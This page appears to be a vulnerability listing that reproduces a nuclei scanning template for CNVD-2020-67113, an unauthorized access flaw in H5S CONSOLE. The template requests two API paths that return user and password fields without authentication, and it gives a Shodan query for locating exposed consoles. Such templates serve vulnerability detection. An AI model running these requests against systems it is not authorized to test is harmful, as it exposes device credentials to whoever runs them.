CNVD-2020-67113: H5S CONSOLE - Unauthorized Access

日期: 2025-08-01 | 影响软件: H5S CONSOLE | POC: 已公开

漏洞描述

H5S CONSOLE is susceptible to an unauthorized access vulnerability.

PoC代码[已公开]

id: CNVD-2020-67113

info:
  name: H5S CONSOLE - Unauthorized Access
  author: ritikchaddha
  severity: medium
  description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
  reference:
    - https://vul.wangan.com/a/CNVD-2020-67113
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-425
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"H5S CONSOLE"
  tags: cnvd,cnvd2020,h5s,unauth,h5sconsole

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/GetSrc"
      - "{{BaseURL}}/api/v1/GetDevice"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'strUser'
          - 'strPasswd'
        condition: and

      - type: word
        part: body
        words:
          - 'H5_AUTO'
          - 'H5_DEV'
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022020b7ce0ebae7bbcac443216bf823d6eca15bf1a735d0416b5b4d9f7b8fce3f6102203a9f7c31a0f3374748506f141b2c2223f9d7e2b7c80b556e38b0a0ff38acbd83:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/./http/cnvd/2020/CNVD-2020-67113.yaml